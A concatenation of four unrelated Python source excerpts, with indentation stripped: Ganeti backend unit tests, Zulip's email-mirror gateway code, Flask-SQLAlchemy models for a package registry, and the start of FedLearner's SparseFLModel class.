self.assertEqual(prepare_fn.Count(), 1)
@staticmethod
def _SuccessfulPrepare(path, cmd):
return (True, utils.PathJoin(path, cmd))
def testRunCmdFails(self):
lockfile = utils.PathJoin(self.tmpdir, "lock")
def fn(args, env=NotImplemented, reset_env=NotImplemented,
postfork_fn=NotImplemented):
self.assertEqual(args, [utils.PathJoin(self.tmpdir, "test3079")])
self.assertEqual(env, {})
self.assertTrue(reset_env)
self.assertTrue(callable(postfork_fn))
trylock = utils.FileLock.Open(lockfile)
try:
# See if lockfile is still held
self.assertRaises(EnvironmentError, trylock.Exclusive, blocking=False)
# Call back to release lock
postfork_fn(NotImplemented)
# See if lockfile can be acquired
trylock.Exclusive(blocking=False)
finally:
trylock.Close()
# Simulate a failed command
return utils.RunResult(constants.EXIT_FAILURE, None,
"stdout", "stderr406328567",
utils.ShellQuoteArgs(args),
NotImplemented, NotImplemented)
sleep_fn = testutils.CallCounter(_SleepForRestrictedCmd)
prepare_fn = testutils.CallCounter(self._SuccessfulPrepare)
runcmd_fn = testutils.CallCounter(fn)
try:
backend.RunRestrictedCmd("test3079",
_lock_timeout=1.0, _lock_file=lockfile,
_path=self.tmpdir, _runcmd_fn=runcmd_fn,
_sleep_fn=sleep_fn, _prepare_fn=prepare_fn,
_enabled=True)
except backend.RPCFail, err:
self.assertTrue(str(err).startswith("Restricted command 'test3079'"
" failed:"))
self.assertTrue("stderr406328567" in str(err),
msg="Error did not include output")
else:
self.fail("Didn't fail")
self.assertEqual(sleep_fn.Count(), 0)
self.assertEqual(prepare_fn.Count(), 1)
self.assertEqual(runcmd_fn.Count(), 1)
def testRunCmdSucceeds(self):
lockfile = utils.PathJoin(self.tmpdir, "lock")
def fn(args, env=NotImplemented, reset_env=NotImplemented,
postfork_fn=NotImplemented):
self.assertEqual(args, [utils.PathJoin(self.tmpdir, "test5667")])
self.assertEqual(env, {})
self.assertTrue(reset_env)
# Call back to release lock
postfork_fn(NotImplemented)
# Simulate a successful command
return utils.RunResult(constants.EXIT_SUCCESS, None, "stdout14463", "",
utils.ShellQuoteArgs(args),
NotImplemented, NotImplemented)
sleep_fn = testutils.CallCounter(_SleepForRestrictedCmd)
prepare_fn = testutils.CallCounter(self._SuccessfulPrepare)
runcmd_fn = testutils.CallCounter(fn)
result = backend.RunRestrictedCmd("test5667",
_lock_timeout=1.0, _lock_file=lockfile,
_path=self.tmpdir, _runcmd_fn=runcmd_fn,
_sleep_fn=sleep_fn,
_prepare_fn=prepare_fn,
_enabled=True)
self.assertEqual(result, "stdout14463")
self.assertEqual(sleep_fn.Count(), 0)
self.assertEqual(prepare_fn.Count(), 1)
self.assertEqual(runcmd_fn.Count(), 1)
def testCommandsDisabled(self):
try:
backend.RunRestrictedCmd("test",
_lock_timeout=NotImplemented,
_lock_file=NotImplemented,
_path=NotImplemented,
_sleep_fn=NotImplemented,
_prepare_fn=NotImplemented,
_runcmd_fn=NotImplemented,
_enabled=False)
except backend.RPCFail, err:
self.assertEqual(str(err),
"Restricted commands disabled at configure time")
else:
self.fail("Did not raise exception")
class TestSetWatcherPause(unittest.TestCase):
def setUp(self):
self.tmpdir = tempfile.mkdtemp()
self.filename = utils.PathJoin(self.tmpdir, "pause")
def tearDown(self):
shutil.rmtree(self.tmpdir)
def testUnsetNonExisting(self):
self.assertFalse(os.path.exists(self.filename))
backend.SetWatcherPause(None, _filename=self.filename)
self.assertFalse(os.path.exists(self.filename))
def testSetNonNumeric(self):
for i in ["", [], {}, "Hello World", "0", "1.0"]:
self.assertFalse(os.path.exists(self.filename))
try:
backend.SetWatcherPause(i, _filename=self.filename)
except backend.RPCFail, err:
self.assertEqual(str(err), "Duration must be numeric")
else:
self.fail("Did not raise exception")
self.assertFalse(os.path.exists(self.filename))
def testSet(self):
self.assertFalse(os.path.exists(self.filename))
for i in range(10):
backend.SetWatcherPause(i, _filename=self.filename)
self.assertEqual(utils.ReadFile(self.filename), "%s\n" % i)
self.assertEqual(os.stat(self.filename).st_mode & 0777, 0644)
class TestGetBlockDevSymlinkPath(unittest.TestCase):
def setUp(self):
self.tmpdir = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.tmpdir)
def _Test(self, name, idx):
self.assertEqual(backend._GetBlockDevSymlinkPath(name, idx,
_dir=self.tmpdir),
("%s/%s%s%s" % (self.tmpdir, name,
constants.DISK_SEPARATOR, idx)))
def test(self):
for idx in range(100):
self._Test("inst1.example.com", idx)
class TestGetInstanceList(unittest.TestCase):
def setUp(self):
self._test_hv = self._TestHypervisor()
self._test_hv.ListInstances = mock.Mock(
return_value=["instance1", "instance2", "instance3"] )
class _TestHypervisor(hypervisor.hv_base.BaseHypervisor):
def __init__(self):
hypervisor.hv_base.BaseHypervisor.__init__(self)
def _GetHypervisor(self, name):
return self._test_hv
def testHvparams(self):
fake_hvparams = {constants.HV_XEN_CMD: constants.XEN_CMD_XL}
hvparams = {constants.HT_FAKE: fake_hvparams}
backend.GetInstanceList([constants.HT_FAKE], all_hvparams=hvparams,
get_hv_fn=self._GetHypervisor)
self._test_hv.ListInstances.assert_called_with(hvparams=fake_hvparams)
class TestGetHvInfo(unittest.TestCase):
def setUp(self):
self._test_hv = self._TestHypervisor()
self._test_hv.GetNodeInfo = mock.Mock()
class _TestHypervisor(hypervisor.hv_base.BaseHypervisor):
def __init__(self):
hypervisor.hv_base.BaseHypervisor.__init__(self)
def _GetHypervisor(self, name):
return self._test_hv
def testGetHvInfoAllNone(self):
result = backend._GetHvInfoAll(None)
self.assertTrue(result is None)
def testGetHvInfoAll(self):
hvname = constants.HT_XEN_PVM
hvparams = {constants.HV_XEN_CMD: constants.XEN_CMD_XL}
hv_specs = [(hvname, hvparams)]
backend._GetHvInfoAll(hv_specs, self._GetHypervisor)
self._test_hv.GetNodeInfo.assert_called_with(hvparams=hvparams)
class TestApplyStorageInfoFunction(unittest.TestCase):
_STORAGE_KEY = "some_key"
_SOME_ARGS = ["some_args"]
def setUp(self):
self.mock_storage_fn = mock.Mock()
def testApplyValidStorageType(self):
storage_type = constants.ST_LVM_VG
info_fn_orig = backend._STORAGE_TYPE_INFO_FN
backend._STORAGE_TYPE_INFO_FN = {
storage_type: self.mock_storage_fn
}
backend._ApplyStorageInfoFunction(
storage_type, self._STORAGE_KEY, self._SOME_ARGS)
self.mock_storage_fn.assert_called_with(self._STORAGE_KEY, self._SOME_ARGS)
backend._STORAGE_TYPE_INFO_FN = info_fn_orig
def testApplyInValidStorageType(self):
storage_type = "invalid_storage_type"
info_fn_orig = backend._STORAGE_TYPE_INFO_FN
backend._STORAGE_TYPE_INFO_FN = {}
self.assertRaises(KeyError, backend._ApplyStorageInfoFunction,
storage_type, self._STORAGE_KEY, self._SOME_ARGS)
backend._STORAGE_TYPE_INFO_FN = info_fn_orig
def testApplyNotImplementedStorageType(self):
storage_type = "not_implemented_storage_type"
info_fn_orig = backend._STORAGE_TYPE_INFO_FN
backend._STORAGE_TYPE_INFO_FN = {storage_type: None}
self.assertRaises(NotImplementedError,
backend._ApplyStorageInfoFunction,
storage_type, self._STORAGE_KEY, self._SOME_ARGS)
backend._STORAGE_TYPE_INFO_FN = info_fn_orig
class TestGetLvmVgSpaceInfo(unittest.TestCase):
def testValid(self):
path = "somepath"
excl_stor = True
orig_fn = backend._GetVgInfo
backend._GetVgInfo = mock.Mock()
backend._GetLvmVgSpaceInfo(path, [excl_stor])
backend._GetVgInfo.assert_called_with(path, excl_stor)
backend._GetVgInfo = orig_fn
def testNoExclStorageNotBool(self):
path = "somepath"
excl_stor = "123"
self.assertRaises(errors.ProgrammerError, backend._GetLvmVgSpaceInfo,
path, [excl_stor])
def testNoExclStorageNotInList(self):
path = "somepath"
excl_stor = "123"
self.assertRaises(errors.ProgrammerError, backend._GetLvmVgSpaceInfo,
path, excl_stor)
class TestGetLvmPvSpaceInfo(unittest.TestCase):
def testValid(self):
path = "somepath"
excl_stor = True
orig_fn = backend._GetVgSpindlesInfo
backend._GetVgSpindlesInfo = mock.Mock()
backend._GetLvmPvSpaceInfo(path, [excl_stor])
backend._GetVgSpindlesInfo.assert_called_with(path, excl_stor)
backend._GetVgSpindlesInfo = orig_fn
class TestCheckStorageParams(unittest.TestCase):
def testParamsNone(self):
self.assertRaises(errors.ProgrammerError, backend._CheckStorageParams,
None, NotImplemented)
def testParamsWrongType(self):
self.assertRaises(errors.ProgrammerError, backend._CheckStorageParams,
"string", NotImplemented)
def testParamsEmpty(self):
backend._CheckStorageParams([], 0)
def testParamsValidNumber(self):
backend._CheckStorageParams(["a", True], 2)
def testParamsInvalidNumber(self):
self.assertRaises(errors.ProgrammerError, backend._CheckStorageParams,
["b", False], 3)
class TestGetVgSpindlesInfo(unittest.TestCase):
def setUp(self):
self.vg_free = 13
self.vg_size = 31
self.mock_fn = mock.Mock(return_value=(self.vg_free, self.vg_size))
def testValidInput(self):
name = "myvg"
excl_stor = True
result = backend._GetVgSpindlesInfo(name, excl_stor, info_fn=self.mock_fn)
self.mock_fn.assert_called_with(name)
self.assertEqual(name, result["name"])
self.assertEqual(constants.ST_LVM_PV, result["type"])
self.assertEqual(self.vg_free, result["storage_free"])
self.assertEqual(self.vg_size, result["storage_size"])
def testNoExclStor(self):
name = "myvg"
excl_stor = False
result = backend._GetVgSpindlesInfo(name, excl_stor, info_fn=self.mock_fn)
self.mock_fn.assert_not_called()
self.assertEqual(name, result["name"])
self.assertEqual(constants.ST_LVM_PV, result["type"])
self.assertEqual(0, result["storage_free"])
self.assertEqual(0, result["storage_size"])
class TestGetVgSpindlesInfo(unittest.TestCase):
def testValidInput(self):
self.vg_free = 13
self.vg_size = 31
self.mock_fn = mock.Mock(return_value=[(self.vg_free, self.vg_size)])
name = "myvg"
excl_stor = True
result = backend._GetVgInfo(name, excl_stor, info_fn=self.mock_fn)
self.mock_fn.assert_called_with([name], excl_stor)
self.assertEqual(name, result["name"])
self.assertEqual(constants.ST_LVM_VG, result["type"])
self.assertEqual(self.vg_free, result["storage_free"])
self.assertEqual(self.vg_size, result["storage_size"])
def testNoExclStor(self):
name = "myvg"
excl_stor = True
self.mock_fn = mock.Mock(return_value=None)
result = backend._GetVgInfo(name, excl_stor, info_fn=self.mock_fn)
self.mock_fn.assert_called_with([name], excl_stor)
self.assertEqual(name, result["name"])
self.assertEqual(constants.ST_LVM_VG, result["type"])
self.assertEqual(None, result["storage_free"])
self.assertEqual(None, result["storage_size"])
class TestGetNodeInfo(unittest.TestCase):
_SOME_RESULT = None
def testApplyStorageInfoFunction(self):
orig_fn = backend._ApplyStorageInfoFunction
backend._ApplyStorageInfoFunction = mock.Mock(
return_value=self._SOME_RESULT)
storage_units = [(st, st + "_key", [st + "_params"]) for st in
constants.STORAGE_TYPES]
backend.GetNodeInfo(storage_units, None)
call_args_list = backend._ApplyStorageInfoFunction.call_args_list
self.assertEqual(len(constants.STORAGE_TYPES), len(call_args_list))
for call in call_args_list:
storage_type, storage_key, storage_params = call[0]
self.assertEqual(storage_type + "_key", storage_key)
self.assertEqual([storage_type + "_params"], storage_params)
self.assertTrue(storage_type in constants.STORAGE_TYPES)
backend._ApplyStorageInfoFunction = orig_fn
class TestSpaceReportingConstants(unittest.TestCase):
"""Ensures consistency between STS_REPORT and backend.
These tests ensure, that the constant 'STS_REPORT' is consitent
with the implementation of invoking space reporting functions
in backend.py. Once space reporting is available for all types,
the constant can be removed and these tests as well.
"""
def testAllReportingTypesHaveAReportingFunction(self):
for storage_type in constants.STS_REPORT:
self.assertTrue(backend._STORAGE_TYPE_INFO_FN[storage_type] is not None)
def testAllNotReportingTypesDoneHaveFunction(self):
non_reporting_types = set(constants.STORAGE_TYPES)\
- set(constants.STS_REPORT)
for storage_type in non_reporting_types:
self.assertEqual(None, backend._STORAGE_TYPE_INFO_FN[storage_type])
if __name__ == "__main__":
testutils.GanetiTestProgram()
|
|
from __future__ import absolute_import
from typing import Any, Optional, Text
import logging
import re
from email.header import decode_header
import email.message as message
from django.conf import settings
from zerver.lib.actions import decode_email_address, get_email_gateway_message_string_from_address, \
internal_send_message
from zerver.lib.notifications import convert_html_to_markdown
from zerver.lib.redis_utils import get_redis_client
from zerver.lib.upload import upload_message_image
from zerver.lib.utils import generate_random_token
from zerver.lib.str_utils import force_text
from zerver.models import Stream, Recipient, get_user_profile_by_email, \
get_user_profile_by_id, get_display_recipient, get_recipient, \
Message, Realm, UserProfile
from six import binary_type
import six
import talon
from talon import quotations
talon.init()
logger = logging.getLogger(__name__)
def redact_stream(error_message):
# type: (Text) -> Text
domain = settings.EMAIL_GATEWAY_PATTERN.rsplit('@')[-1]
stream_match = re.search(u'\\b(.*?)@' + domain, error_message)
if stream_match:
stream_name = stream_match.groups()[0]
return error_message.replace(stream_name, "X" * len(stream_name))
return error_message
def report_to_zulip(error_message):
# type: (Text) -> None
if settings.ERROR_BOT is None:
return
error_bot = get_user_profile_by_email(settings.ERROR_BOT)
error_stream = Stream.objects.get(name="errors", realm=error_bot.realm)
send_zulip(settings.ERROR_BOT, error_stream, u"email mirror error",
u"""~~~\n%s\n~~~""" % (error_message,))
def log_and_report(email_message, error_message, debug_info):
# type: (message.Message, Text, Dict[str, Any]) -> None
scrubbed_error = u"Sender: %s\n%s" % (email_message.get("From"),
redact_stream(error_message))
if "to" in debug_info:
scrubbed_error = u"Stream: %s\n%s" % (redact_stream(debug_info["to"]),
scrubbed_error)
if "stream" in debug_info:
scrubbed_error = u"Realm: %s\n%s" % (debug_info["stream"].realm.domain,
scrubbed_error)
logger.error(scrubbed_error)
report_to_zulip(scrubbed_error)
# Temporary missed message addresses
redis_client = get_redis_client()
def missed_message_redis_key(token):
# type: (Text) -> Text
return 'missed_message:' + token
def is_missed_message_address(address):
# type: (Text) -> bool
msg_string = get_email_gateway_message_string_from_address(address)
return is_mm_32_format(msg_string)
def is_mm_32_format(msg_string):
# type: (Text) -> bool
'''
Missed message strings are formatted with a little "mm" prefix
followed by a randomly generated 32-character string.
'''
return msg_string.startswith('mm') and len(msg_string) == 34
def get_missed_message_token_from_address(address):
# type: (Text) -> Text
msg_string = get_email_gateway_message_string_from_address(address)
if msg_string is None:
raise ZulipEmailForwardError('Address not recognized by gateway.')
if not is_mm_32_format(msg_string):
raise ZulipEmailForwardError('Could not parse missed message address')
# strip off the 'mm' before returning the redis key
return msg_string[2:]
def create_missed_message_address(user_profile, message):
# type: (UserProfile, Message) -> Text
if settings.EMAIL_GATEWAY_PATTERN == '':
logging.warning("EMAIL_GATEWAY_PATTERN is an empty string, using "
"NOREPLY_EMAIL_ADDRESS in the 'from' field.")
return settings.NOREPLY_EMAIL_ADDRESS
if message.recipient.type == Recipient.PERSONAL:
# We need to reply to the sender so look up their personal recipient_id
recipient_id = get_recipient(Recipient.PERSONAL, message.sender_id).id
else:
recipient_id = message.recipient_id
data = {
'user_profile_id': user_profile.id,
'recipient_id': recipient_id,
'subject': message.subject,
}
while True:
token = generate_random_token(32)
key = missed_message_redis_key(token)
if redis_client.hsetnx(key, 'uses_left', 1):
break
with redis_client.pipeline() as pipeline:
pipeline.hmset(key, data)
pipeline.expire(key, 60 * 60 * 24 * 5)
pipeline.execute()
address = u'mm' + token
return settings.EMAIL_GATEWAY_PATTERN % (address,)
def mark_missed_message_address_as_used(address):
# type: (Text) -> None
token = get_missed_message_token_from_address(address)
key = missed_message_redis_key(token)
with redis_client.pipeline() as pipeline:
pipeline.hincrby(key, 'uses_left', -1)
pipeline.expire(key, 60 * 60 * 24 * 5)
new_value = pipeline.execute()[0]
if new_value < 0:
redis_client.delete(key)
raise ZulipEmailForwardError('Missed message address has already been used')
def send_to_missed_message_address(address, message):
# type: (Text, message.Message) -> None
token = get_missed_message_token_from_address(address)
key = missed_message_redis_key(token)
result = redis_client.hmget(key, 'user_profile_id', 'recipient_id', 'subject')
if not all(val is not None for val in result):
raise ZulipEmailForwardError('Missing missed message address data')
user_profile_id, recipient_id, subject = result
user_profile = get_user_profile_by_id(user_profile_id)
recipient = Recipient.objects.get(id=recipient_id)
display_recipient = get_display_recipient(recipient)
# Testing with basestring so we don't depend on the list return type from
# get_display_recipient
if not isinstance(display_recipient, six.string_types):
recipient_str = ','.join([user['email'] for user in display_recipient])
else:
recipient_str = display_recipient
body = filter_footer(extract_body(message))
body += extract_and_upload_attachments(message, user_profile.realm)
if not body:
body = '(No email body)'
if recipient.type == Recipient.STREAM:
recipient_type_name = 'stream'
else:
recipient_type_name = 'private'
internal_send_message(user_profile.realm, user_profile.email,
recipient_type_name, recipient_str, subject, body)
logging.info("Successfully processed email from %s to %s" % (
user_profile.email, recipient_str))
## Sending the Zulip ##
class ZulipEmailForwardError(Exception):
pass
def send_zulip(sender, stream, topic, content):
# type: (Text, Stream, Text, Text) -> None
internal_send_message(
stream.realm,
sender,
"stream",
stream.name,
topic[:60],
content[:2000])
def valid_stream(stream_name, token):
# type: (Text, Text) -> bool
try:
stream = Stream.objects.get(email_token=token)
return stream.name.lower() == stream_name.lower()
except Stream.DoesNotExist:
return False
def get_message_part_by_type(message, content_type):
# type: (message.Message, Text) -> Text
charsets = message.get_charsets()
for idx, part in enumerate(message.walk()):
if part.get_content_type() == content_type:
content = part.get_payload(decode=True)
assert isinstance(content, binary_type)
if charsets[idx]:
text = content.decode(charsets[idx], errors="ignore")
return text
def extract_body(message):
# type: (message.Message) -> Text
# If the message contains a plaintext version of the body, use
# that.
plaintext_content = get_message_part_by_type(message, "text/plain")
if plaintext_content:
return quotations.extract_from_plain(plaintext_content)
# If we only have an HTML version, try to make that look nice.
html_content = get_message_part_by_type(message, "text/html")
if html_content:
html_content = quotations.extract_from_html(html_content)
return convert_html_to_markdown(html_content)
raise ZulipEmailForwardError("Unable to find plaintext or HTML message body")
def filter_footer(text):
# type: (Text) -> Text
# Try to filter out obvious footers.
possible_footers = [line for line in text.split("\n") if line.strip().startswith("--")]
if len(possible_footers) != 1:
# Be conservative and don't try to scrub content if there
# isn't a trivial footer structure.
return text
return text.partition("--")[0].strip()
def extract_and_upload_attachments(message, realm):
# type: (message.Message, Realm) -> Text
user_profile = get_user_profile_by_email(settings.EMAIL_GATEWAY_BOT)
attachment_links = []
payload = message.get_payload()
if not isinstance(payload, list):
# This is not a multipart message, so it can't contain attachments.
return ""
for part in payload:
content_type = part.get_content_type()
filename = part.get_filename()
if filename:
attachment = part.get_payload(decode=True)
if isinstance(attachment, binary_type):
s3_url = upload_message_image(filename, len(attachment), content_type,
attachment,
user_profile,
target_realm=realm)
formatted_link = u"[%s](%s)" % (filename, s3_url)
attachment_links.append(formatted_link)
else:
logger.warning("Payload is not bytes (invalid attachment %s in message from %s)." %
(filename, message.get("From")))
return u"\n".join(attachment_links)
def extract_and_validate(email):
# type: (Text) -> Stream
try:
stream_name, token = decode_email_address(email)
except (TypeError, ValueError):
raise ZulipEmailForwardError("Malformed email recipient " + email)
if not valid_stream(stream_name, token):
raise ZulipEmailForwardError("Bad stream token from email recipient " + email)
return Stream.objects.get(email_token=token)
def find_emailgateway_recipient(message):
# type: (message.Message) -> Text
# We can't use Delivered-To; if there is a X-Gm-Original-To
# it is more accurate, so try to find the most-accurate
# recipient list in descending priority order
recipient_headers = ["X-Gm-Original-To", "Delivered-To", "To"]
recipients = [] # type: List[Text]
for recipient_header in recipient_headers:
r = message.get_all(recipient_header, None)
if r:
recipients = r
break
pattern_parts = [re.escape(part) for part in settings.EMAIL_GATEWAY_PATTERN.split('%s')]
match_email_re = re.compile(".*?".join(pattern_parts))
for recipient_email in recipients:
if match_email_re.match(recipient_email):
return recipient_email
raise ZulipEmailForwardError("Missing recipient in mirror email")
def process_stream_message(to, subject, message, debug_info):
# type: (Text, Text, message.Message, Dict[str, Any]) -> None
stream = extract_and_validate(to)
body = filter_footer(extract_body(message))
body += extract_and_upload_attachments(message, stream.realm)
debug_info["stream"] = stream
send_zulip(settings.EMAIL_GATEWAY_BOT, stream, subject, body)
logging.info("Successfully processed email to %s (%s)" % (
stream.name, stream.realm.domain))
def process_missed_message(to, message, pre_checked):
# type: (Text, message.Message, bool) -> None
if not pre_checked:
mark_missed_message_address_as_used(to)
send_to_missed_message_address(to, message)
def process_message(message, rcpt_to=None, pre_checked=False):
# type: (message.Message, Optional[Text], bool) -> None
subject_header = message.get("Subject", "(no subject)")
encoded_subject, encoding = decode_header(subject_header)[0]
if encoding is None:
subject = force_text(encoded_subject) # encoded_subject has type str when encoding is None
else:
try:
subject = encoded_subject.decode(encoding)
except (UnicodeDecodeError, LookupError):
subject = u"(unreadable subject)"
debug_info = {}
try:
if rcpt_to is not None:
to = rcpt_to
else:
to = find_emailgateway_recipient(message)
debug_info["to"] = to
if is_missed_message_address(to):
process_missed_message(to, message, pre_checked)
else:
process_stream_message(to, subject, message, debug_info)
except ZulipEmailForwardError as e:
# TODO: notify sender of error, retry if appropriate.
log_and_report(message, str(e), debug_info)
|
|
from app import db, cache
from utils import cache_timeout
import datetime
dependencies = db.Table(
'dependencies',
db.Column('dependency_id', db.Integer, db.ForeignKey('dependency.id')),
db.Column('package_id', db.Integer, db.ForeignKey('package.id'))
)
keywords = db.Table(
'keywords',
db.Column('keyword_id', db.Integer, db.ForeignKey('keyword.id')),
db.Column('package_id', db.Integer, db.ForeignKey('package.id'))
)
class Package(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(255), unique=True, nullable=False)
author = db.Column(db.String(50))
url = db.Column(db.String(140))
description = db.Column(db.Text())
stars = db.Column(db.Integer, default=0)
downloads = db.relationship('Downloads', backref='package', lazy='dynamic')
version = db.relationship('Version', backref='package', lazy='dynamic')
license_id = db.Column(db.Integer, db.ForeignKey('license.id'), nullable=True)
dependencies = db.relationship('Dependency', secondary=dependencies,
lazy='dynamic', backref=db.backref('packages', lazy='dynamic'))
keywords = db.relationship('Keyword', secondary=keywords,
lazy='dynamic', backref=db.backref('packages', lazy='dynamic'))
def __repr__(self):
return 'Package: %s' % self.name
@classmethod
def get_count(self):
return Package.query.count()
@classmethod
def get_package(self, name):
return self.query.filter(self.name == name).first()
@cache_timeout
@cache.memoize()
def get_json(self):
json_data = dict()
# add following parameters to dict
for label in ['name', 'author', 'url', 'description', 'stars']:
json_data[label] = getattr(self, label)
version_obj = self.version.order_by(Version.id.desc()).first()
version_data = version_obj.get_json() if version_obj is not None else {}
downloads_data = Downloads.get_json(self.downloads)
deps_models = self.dependencies.all()
keys_models = self.keywords.all()
json_data['version'] = version_data
json_data['downloads'] = downloads_data
json_data['downloads_list'] = Downloads.get_list(self.downloads)
json_data['license'] = {} if self.license is None else self.license.get_json()
json_data['dependencies'] = [item.get_json() for item in deps_models]
json_data['keywords'] = [item.get_json() for item in keys_models]
return json_data
class Version(db.Model):
id = db.Column(db.Integer, primary_key=True)
number = db.Column(db.String(50), nullable=False)
date = db.Column(db.DateTime, default=datetime.date.today, nullable=False)
package_id = db.Column(db.Integer, db.ForeignKey('package.id'), nullable=False)
def __repr__(self):
return 'Ver: {} on {}'.format(self.number, self.date)
def get_json(self):
json_data = dict()
json_data['number'] = self.number
json_data['date'] = self.date.isoformat()
return json_data
class License(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(50), nullable=False)
url = db.Column(db.String(255))
package = db.relationship('Package', backref='license', lazy='dynamic')
def __repr__(self):
return 'Lic: {} at {}'.format(self.name, self.url)
def get_json(self):
json_data = dict()
json_data['name'] = self.name
json_data['url'] = self.url
return json_data
class Dependency(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(50), nullable=False)
url = db.Column(db.String(255))
def __repr__(self):
return 'Dep: {} at {}'.format(self.name, self.url)
def get_json(self):
json_data = dict()
json_data['name'] = self.name
json_data['url'] = self.url
return json_data
class Keyword(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(50), nullable=False)
def __repr__(self):
return 'Key: {} '.format(self.name)
def get_json(self):
return self.name
class DbFlags(db.Model):
id = db.Column(db.Integer, primary_key=True)
date = db.Column(db.DateTime, default=datetime.date.today, nullable=False)
flag = db.Column(db.Boolean, nullable=False)
def __repr__(self):
return 'DbFlags: {} {}'.format(self.date, self.flag)
@classmethod
def get_update_time(self):
return self.query.filter(self.id == 1).first().date
class Downloads(db.Model):
id = db.Column(db.Integer, primary_key=True)
downloads = db.Column(db.Integer, nullable=False)
date = db.Column(db.DateTime, default=datetime.date.today, nullable=False)
package_id = db.Column(db.Integer, db.ForeignKey('package.id'), nullable=False)
@classmethod
def nearest_last_entry(self, time):
last_date = self.query.order_by(False).first().date
while self.query.filter(self.date == time).count() <= 0:
if last_date >= time:
time = last_date
break
time -= datetime.timedelta(days=1)
return time
@classmethod
def __count_downloads(self, entries):
count = 0
for entry in entries:
count += entry.downloads
return count
# period should be a datetime.timedelta
@classmethod
def get_overall_downloads_count(self, period):
current_time = DbFlags.get_update_time()
current_entries = self.query.filter(self.date == current_time).all()
old_time = self.nearest_last_entry(current_time - period)
old_entries = self.query.filter(self.date == old_time).all()
current_downloads = self.__count_downloads(current_entries)
old_downloads = self.__count_downloads(old_entries)
return current_downloads - old_downloads
@classmethod
def get_package_downloads_count(self, query, period):
current_time = query.first().date
time = current_time - period
last_date = query.order_by(False).first().date
while query.filter(self.date == time).first() is None:
if last_date >= time:
time = last_date
break
time -= datetime.timedelta(days=1)
count = query.filter(self.date == time).first().downloads
return count
@classmethod
def get_json(self, query):
json_data = dict()
query = query.order_by(self.id.desc())
json_data['total'] = query.first().downloads
count = self.get_package_downloads_count(query, datetime.timedelta(days=30))
json_data['month'] = json_data['total'] - count
count = self.get_package_downloads_count(query, datetime.timedelta(days=7))
json_data['week'] = json_data['total'] - count
count = self.get_package_downloads_count(query, datetime.timedelta(days=1))
json_data['day'] = json_data['total'] - count
return json_data
@classmethod
def get_list(self, query):
models = query.order_by(self.id.desc()).limit(50).all()
return [item.downloads for item in models]
|
|
# Copyright 2020 The FedLearner Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
# pylint: disable=protected-access
import tensorflow.compat.v1 as tf
from tensorflow.contrib import graph_editor as ge
from fedlearner.trainer import embedding
from fedlearner.trainer import estimator
from fedlearner.trainer import feature
from fedlearner.trainer import operator
from fedlearner.trainer import utils
class ConfigRunError(Exception):
pass
class SparseFLModel(estimator.FLModel):
def __init__(self, role, bridge, example_ids, exporting=False,
config_run=True,
bias_tensor=None, vec_tensor=None,
bias_embedding=None, vec_embedding=None,
feature_columns=None):
super(SparseFLModel, self).__init__(role,
bridge, example_ids, exporting)
self._config_run = config_run
self._num_shards = 1
if config_run:
self._bias_tensor = tf.placeholder(tf.float32, shape=[None, None])
self._vec_tensor = tf.placeholder(tf.float32, shape=[None, None])
else:
self._bias_tensor = bias_tensor
self._vec_tensor = vec_tensor
self._bias_embedding = bias_embedding
self._vec_embedding = vec_embedding
self._feature_columns = feature_columns
self._frozen = False
self._slot_ids = []
self._feature_slots = {}
self._feature_column_v1s = {}
self._use_fid_v2 = False
self._num_embedding_groups = 3
def add_feature_slot(self, *args, **kwargs):
assert not self._frozen, "Cannot modify model after finalization"
fs = feature.FeatureSlot(*args, **kwargs)
if self._use_fid_v2:
assert 0 <= fs.slot_id < utils.MAX_SLOTS_v2, \
"Invalid slot id %d"%fs.slot_id
else:
assert 0 <= fs.slot_id < utils.MAX_SLOTS, \
"Invalid slot id %d"%fs.slot_id
self._slot_ids.append(fs.slot_id)
self._feature_slots[fs.slot_id] = fs
return fs
def add_feature_column(self, *args, **kwargs):
assert not self._frozen, "Cannot modify model after finalization"
fc = feature.FeatureColumnV1(*args, **kwargs)
slot_id = fc.feature_slot.slot_id
assert slot_id in self._feature_slots and \
self._feature_slots[slot_id] is fc.feature_slot, \
"FeatureSlot with id %d must be added to Model first"%slot_id
assert slot_id not in self._feature_column_v1s, \
"Only one FeatureColumnV1 can be created for each slot"
self._feature_column_v1s[slot_id] = fc
return fc
def set_use_fid_v2(self, use_fid_v2):
self._use_fid_v2 = use_fid_v2
def get_bias(self):
return self._bias_tensor
def get_vec(self):
return self._vec_tensor
def _get_bias_slot_configs(self):
if not self._config_run:
return self._bias_embedding.config if self._bias_embedding else None
slot_list = []
fs_map = {}
for slot_id in self._slot_ids:
fs = self._feature_slots[slot_id]
key = (id(fs._bias_initializer), id(fs._bias_optimizer))
fs_map[key] = fs
slot_list.append((fs.slot_id, 1, fs.hash_table_size, key))
if not slot_list:
return None
bias_config = utils._compute_slot_config(slot_list, 1,
self._use_fid_v2)
bias_config['name'] = 'bias'
bias_config['slot_list'] = slot_list
bias_config['initializers'] = [fs_map[i]._bias_initializer
for i in bias_config['weight_group_keys']]
bias_config['optimizers'] = [fs_map[i]._bias_optimizer
for i in bias_config['weight_group_keys']]
bias_config['use_fid_v2'] = self._use_fid_v2
return bias_config
def _get_vec_slot_configs(self):
if not self._config_run:
return self._vec_embedding.config if self._vec_embedding else None
slot_list = []
fs_map = {}
for slot_id in self._slot_ids:
if slot_id not in self._feature_column_v1s:
continue
fc = self._feature_column_v1s[slot_id]
fs = fc.feature_slot
if fc.feature_slot.dim > 1:
key = (id(fs._vec_initializer), id(fs._vec_optimizer))
fs_map[key] = fs
slot_list.append((slot_id, fs.dim - 1, fs.hash_table_size, key))
if not slot_list:
return None
vec_config = utils._compute_slot_config(slot_list,
self._num_embedding_groups,
self._use_fid_v2)
vec_config['name'] = 'vec'
vec_config['slot_list'] = slot_list
